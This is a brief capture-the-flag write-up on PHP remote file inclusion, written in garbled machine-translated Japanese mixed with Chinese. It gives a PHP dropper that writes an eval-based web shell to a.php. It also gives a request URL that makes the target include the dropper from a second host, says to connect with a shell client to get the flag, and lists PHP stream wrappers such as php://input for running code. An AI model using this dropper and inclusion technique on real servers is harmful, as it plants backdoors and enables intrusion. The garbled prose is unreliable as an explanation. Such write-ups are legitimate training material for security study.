簡単な質問には、リモートファイルを学習することは、擬似プロトコルが含まれています
件名の説明:
この方法の一つ:
使用urlリアライズのPHPリモートファイルインクルージョン
サーバー上の構造1.txt
<?php
$a = "<?php eval(\$_POST['123'])?>";
$b = fopen("a.php","w") or die("123!");
fwrite($b,$a);
fclose($b);
?>
アクセス:
http://ip1/index.php?url=http://ip2/1.txt
A.phpは、ルートディレクトリに生成しました
フラグを取得するために包丁を使用して接続。
方法2:PHP擬似プロトコル
次のようにPHPのサポートは、合意された擬似:
file:// — 访问本地文件系统 必须是绝对路径
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)php://input 将post请求的数据当作php代码执行
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流
php.iniのallow_url_fopenをしてはallow_url_includeにおける2つの重要なパラメータがあります。
allow_url_fopen:默认值是ON,允许url里的封装协议访问文件
allow_url_include:默认值是OFF,不允许包含url里的封装协议包含文件
